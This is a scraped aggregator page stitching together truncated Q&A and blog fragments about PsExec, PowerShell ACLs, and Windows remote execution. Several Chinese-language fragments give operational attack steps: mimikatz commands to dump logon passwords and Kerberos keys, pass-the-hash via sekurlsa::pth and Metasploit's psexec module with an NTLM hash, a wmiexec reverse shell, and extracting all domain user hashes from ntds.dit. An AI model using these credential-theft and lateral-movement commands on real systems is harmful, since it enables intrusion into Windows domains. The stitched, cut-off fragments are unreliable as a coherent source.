psexec

PsExec works only with “runas /netonly”, not with -u and -p parameters

坚强是说给别人听的谎言 提交于 2020-01-24 22:02:09
问题 What I mean: If I... run runas /netonly /user:computername\username cmd enter the password for the local admin account "username" then type psexec \\computername cmd I now have a working shell and can run commands as the local admin user on the remote machine. However , trying to run this without the runas... and instead with the username and password arguments of psexec returns an access denied error. Example below: psexec \\computername -u username -p password cmd Access Denied Note: Others

Set Folder, Subfolder and File Permission Set-ACL Powershell Script. Setting File Inherititance does not work

杀马特。学长 韩版系。学妹 提交于 2020-01-24 00:49:28
问题 I need some help with my Powershell Script. my customer got a huge directory and i need to change the Security Settings. I made this code below and It works but i got one problem: The inheritance on the Files does not work so the Security permissions on any File in the directory is not set. Maybe Someone will find my error. XML File: <?xml version="1.0" encoding="utf-8"?> <Pfade> <pfad name="E:\Share\TEST"> <gruppe name="Domain Admins"> <rechte>FullControl</rechte> <aktion>allow</aktion>

Windows远程执行命令

a 夏天 提交于 2020-01-21 19:57:43
环境:Win10、Win7虚拟机 Windows远程命令执行 1、psexec.exe远程执行命令 psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe 这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。 2、使用Hash登陆Windows mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" 或者使用wce抓取hash值: msf调用payload: use exploit/windows/smb/psexec show options set RHOST 192.168.30.128 Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B set SMBUser Administrator show options Run 3、利用wmiexec工具配合进行反弹半交互shell cscript.exe //nologo

Windows NTLM Hash和Hash传递、Key传递攻击

[亡魂溺海] 提交于 2020-01-09 02:40:23
Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /ntlm:xxxxxxxxxxxx #hash传递 sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /aes256:xxxxxxxxxxxxxx #key传递 Metaspolit 传递Hash msf> use windows/smb/psexec msf exploit(windows/smb/psexec)>set rhost a.b.c.d msf exploit(windows/smb/psexec)>set rport 445 (139会更好一点) msf exploit(windows/smb/psexec)>set smbuser xxxx msf exploit(windows/smb/psexec)>set smbpass hashdump中的hash msf exploit(windows/smb

如何抓取所有域用户的hash(win2008--win2012)

前提是你 提交于 2020-01-08 12:04:19
如何抓取所有域用户的hash gethashes.exe 和gsecdump.exe都直接悲剧,这意味着想要轻量级的抓取所有域用户hash已经很难了。 在线抓取失败,没办法只能祭出终极武器:离线抓取! 第一种办法: vssown.vbs + libesedb + NtdsXtract 详细出处参考这里:http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html 首先用vssown.vbs把域数据库ntds.dit和SYSTEM文件复制一份,然后把复制文件下载回本地,再利用libesedb分解ntds.dit文件,最后用NtdsXtract分析出用户hash信息, 这种方法除了能获取用户当前密码hash外,还能获取历史密码hash值,能给社工带来更多的帮助。除此之外还能获取很多其他的信息,比如所有计算机列表,操作系统等等保存在域数据库中的数据。 具体的操作过程就直接上图了,不懂得可以去看那篇英文的文章 不过有一点需要注意,那篇文章过后vssown.vbs有更新过,在创建shadow copy时需要指定盘符,不然会有个下标越界的错误,这是为了方便当域数据库保存在D盘时的情况。 Windows server 2012 用户hash抓取方法研究(本地+域) 然后把ntds.dit和SYSTEM这两个文件下载回本地

Jar not accepting values

主宰稳场 提交于 2020-01-07 02:34:46
问题 I have a jar file which when run from command prompt works well, I mean it asks for user input,but when the same is run from psexec or powershell or jenkins doesn't accept values and starts processing further commands. In short: When jar is executed, there is a menu to make choices. If choice is within specific range, it works well else gives message entered value is not valid . Here I am getting the message in a loop. Can anyone suggest where I am going wrong or need to make any change in

using cmd's Start command to run exe. Works locally, but not remotely

孤人 提交于 2020-01-05 08:22:44
问题 Some background: We are trying to automate installation of an agent on servers. The automated workflow will check for servers that need this install. If so, the workflow copies the necessary install files as well as a .cmd batch file. When calling this .cmd script locally, the install works fine. But when trying to call this script remotely from the workflow server, it hangs on a certain line in the batch. Snippet from the script se_install.cmd: echo Installing SE 9.4 Agent start "" /wait

Does psexec support input redirection?

佐手、 提交于 2020-01-04 19:47:33
问题 I am trying to control a remote Python script via psexec, which reads commands from stdin, but I need to redirect psexec's input since psexec itself will be launched from another program. However, I have no luck making psexec accept redirected input. Is it supposed to work at all? An example of what I'm trying to do, where input is a file containing input to the remote script: psexec \\mymachine python c:\script.py < input 回答1: Here's one way I was able to kinda accomplish what you're after:

Wait for PsExec calling cmd /c to finish in PowerShell

╄→гoц情女王★ 提交于 2020-01-04 05:21:18
问题 I have a dynamically generated batch file that I push out to a remote PC and then execute it using PsExec. The issue I am facing is that as soon as that line is called, the PowerShell script moves on and doesn't wait for it to finish. Here is what I have: psexec -accepteula \\$Server -u Username -p Password-d -i 2 cmd /c C:\Call.bat Call.bat calls an executable on the remote machine with a few parameters passed in. This file is dynamically generated and is different every time, but can look

Kill a process on multiple remote machines

天大地大妈咪最大 提交于 2019-12-31 03:30:48
问题 I am looking as the title says to kill a process (for example name.exe) on multiple remote machines. I can do it individually using pskill or taskkill using (for example): pskill -t \ -u -p name.exe but this becomes impractical with 50+ machines. Is there a way to make it read a text file of IP Addresses like psexec does using the @C:\name.txt or in powershell or something similar? All devices are on the same domain. Thank you in advance for your help. 回答1: If you have a text file with a list